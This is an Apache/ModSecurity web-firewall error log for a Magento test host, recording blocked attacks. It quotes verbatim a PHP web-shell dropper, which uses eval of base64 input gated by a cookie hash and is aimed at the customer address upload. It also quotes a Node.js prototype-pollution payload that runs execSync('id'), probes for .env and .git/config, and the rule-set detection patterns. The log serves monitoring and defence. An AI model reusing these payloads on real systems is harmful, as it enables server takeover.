[Sat Dec 13 10:29:41.621366 2025] [:error] [pid 704178] [client 213.109.224.165:19641] [client 213.109.224.165] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/x/6x88364f428d25.php8"] [unique_id "aT0yBY1u9oCb1jebgY7yzgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 13 10:29:41.624115 2025] [:error] [pid 704178] [client 213.109.224.165:19641] [client 213.109.224.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/x/6x88364f428d25.php8"] [unique_id "aT0yBY1u9oCb1jebgY7yzgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 13 10:29:41.624356 2025] [:error] [pid 704178] [client 213.109.224.165:19641] [client 213.109.224.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/x/6x88364f428d25.php8"] [unique_id "aT0yBY1u9oCb1jebgY7yzgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 13 19:12:39.168164 2025] [:error] [pid 714752] [client 144.24.139.118:41068] [client 144.24.139.118] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}} found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(id).tostring().trim().replace(/n/g | ) throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aT2sl8NJkaG_Ctskrcoc-gAAADE"]
[Sat Dec 13 19:12:39.169695 2025] [:error] [pid 714752] [client 144.24.139.118:41068] [client 144.24.139.118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aT2sl8NJkaG_Ctskrcoc-gAAADE"]
[Sat Dec 13 19:12:39.169882 2025] [:error] [pid 714752] [client 144.24.139.118:41068] [client 144.24.139.118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aT2sl8NJkaG_Ctskrcoc-gAAADE"]
[Sun Dec 14 04:01:32.705416 2025] [:error] [pid 725970] [client 37.112.219.146:44540] [client 37.112.219.146] ModSecurity: Rule 7ff8018b6be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/v/iv88364f428d25.phar"] [unique_id "aT4ojEUErFn9xBIdCzkB_AAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 04:01:32.705938 2025] [:error] [pid 725970] [client 37.112.219.146:44540] [client 37.112.219.146] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/v/iv88364f428d25.phar"] [unique_id "aT4ojEUErFn9xBIdCzkB_AAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 04:01:32.708413 2025] [:error] [pid 725970] [client 37.112.219.146:44540] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/v/iv88364f428d25.phar"] [unique_id "aT4ojEUErFn9xBIdCzkB_AAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 04:01:32.708626 2025] [:error] [pid 725970] [client 37.112.219.146:44540] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/v/iv88364f428d25.phar"] [unique_id "aT4ojEUErFn9xBIdCzkB_AAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 04:01:33.080693 2025] [:error] [pid 725970] [client 37.112.219.146:44540] [client 37.112.219.146] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: iv88364f428d25.php8 found within FILES:custom_attributes[country_id]: iv88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aT4ojUUErFn9xBIdCzkB_QAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/i/v/iv88364f428d25.phar
[Sun Dec 14 04:01:33.081359 2025] [:error] [pid 725970] [client 37.112.219.146:44540] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aT4ojUUErFn9xBIdCzkB_QAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/i/v/iv88364f428d25.phar
[Sun Dec 14 04:01:33.081545 2025] [:error] [pid 725970] [client 37.112.219.146:44540] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aT4ojUUErFn9xBIdCzkB_QAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/i/v/iv88364f428d25.phar
[Sun Dec 14 04:01:33.451793 2025] [:error] [pid 725970] [client 37.112.219.146:44540] [client 37.112.219.146] ModSecurity: Rule 7ff8018b6be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/v/iv88364f428d25.php8"] [unique_id "aT4ojUUErFn9xBIdCzkB_gAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 04:01:33.452283 2025] [:error] [pid 725970] [client 37.112.219.146:44540] [client 37.112.219.146] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/v/iv88364f428d25.php8"] [unique_id "aT4ojUUErFn9xBIdCzkB_gAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 04:01:33.454823 2025] [:error] [pid 725970] [client 37.112.219.146:44540] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/v/iv88364f428d25.php8"] [unique_id "aT4ojUUErFn9xBIdCzkB_gAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 04:01:33.455041 2025] [:error] [pid 725970] [client 37.112.219.146:44540] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/v/iv88364f428d25.php8"] [unique_id "aT4ojUUErFn9xBIdCzkB_gAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 04:16:56.883028 2025] [authz_core:error] [pid 725962] [client 139.59.231.238:47204] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Dec 14 04:17:00.018324 2025] [:error] [pid 725946] [client 139.59.231.238:45606] [client 139.59.231.238] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aT4sLKnSE5_lC1C3wshu6wAAAAQ"]
[Sun Dec 14 04:17:00.018598 2025] [:error] [pid 725946] [client 139.59.231.238:45606] [client 139.59.231.238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aT4sLKnSE5_lC1C3wshu6wAAAAQ"]
[Sun Dec 14 04:17:00.018779 2025] [:error] [pid 725946] [client 139.59.231.238:45606] [client 139.59.231.238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aT4sLKnSE5_lC1C3wshu6wAAAAQ"]
[Sun Dec 14 04:17:01.057806 2025] [:error] [pid 725970] [client 139.59.231.238:45608] [client 139.59.231.238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT4sLUUErFn9xBIdCzkCAwAAAAc"]
[Sun Dec 14 04:17:01.058034 2025] [:error] [pid 725970] [client 139.59.231.238:45608] [client 139.59.231.238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT4sLUUErFn9xBIdCzkCAwAAAAc"]
[Sun Dec 14 04:17:01.058185 2025] [:error] [pid 725970] [client 139.59.231.238:45608] [client 139.59.231.238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aT4sLUUErFn9xBIdCzkCAwAAAAc"]
[Sun Dec 14 04:17:03.070211 2025] [:error] [pid 725944] [client 139.59.231.238:45618] [client 139.59.231.238] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT4sL_riWl83-O5fNounCwAAAAI"]
[Sun Dec 14 04:17:03.070473 2025] [:error] [pid 725944] [client 139.59.231.238:45618] [client 139.59.231.238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT4sL_riWl83-O5fNounCwAAAAI"]
[Sun Dec 14 04:17:03.070658 2025] [:error] [pid 725944] [client 139.59.231.238:45618] [client 139.59.231.238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT4sL_riWl83-O5fNounCwAAAAI"]
[Sun Dec 14 18:46:06.354772 2025] [:error] [pid 735495] [client 45.153.34.216:48324] [client 45.153.34.216] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT733jLTNN2v7TAFw3jPegAAAAA"]
[Sun Dec 14 18:46:06.356326 2025] [:error] [pid 735495] [client 45.153.34.216:48324] [client 45.153.34.216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT733jLTNN2v7TAFw3jPegAAAAA"]
[Sun Dec 14 18:46:06.356558 2025] [:error] [pid 735495] [client 45.153.34.216:48324] [client 45.153.34.216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aT733jLTNN2v7TAFw3jPegAAAAA"]
[Sun Dec 14 21:29:26.820137 2025] [:error] [pid 725944] [client 146.103.119.117:34200] [client 146.103.119.117] ModSecurity: Rule 7ff8018b6be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/i/6i88364f428d25.phar"] [unique_id "aT8eJvriWl83-O5fNouomgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 21:29:26.820643 2025] [:error] [pid 725944] [client 146.103.119.117:34200] [client 146.103.119.117] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/i/6i88364f428d25.phar"] [unique_id "aT8eJvriWl83-O5fNouomgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 21:29:26.823136 2025] [:error] [pid 725944] [client 146.103.119.117:34200] [client 146.103.119.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/i/6i88364f428d25.phar"] [unique_id "aT8eJvriWl83-O5fNouomgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 21:29:26.823327 2025] [:error] [pid 725944] [client 146.103.119.117:34200] [client 146.103.119.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/i/6i88364f428d25.phar"] [unique_id "aT8eJvriWl83-O5fNouomgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 14 21:29:27.369311 2025] [:error] [pid 725944] [client 146.103.119.117:34200] [client 146.103.119.117] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 6i88364f428d25.php8 found within FILES:custom_attributes[country_id]: 6i88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id 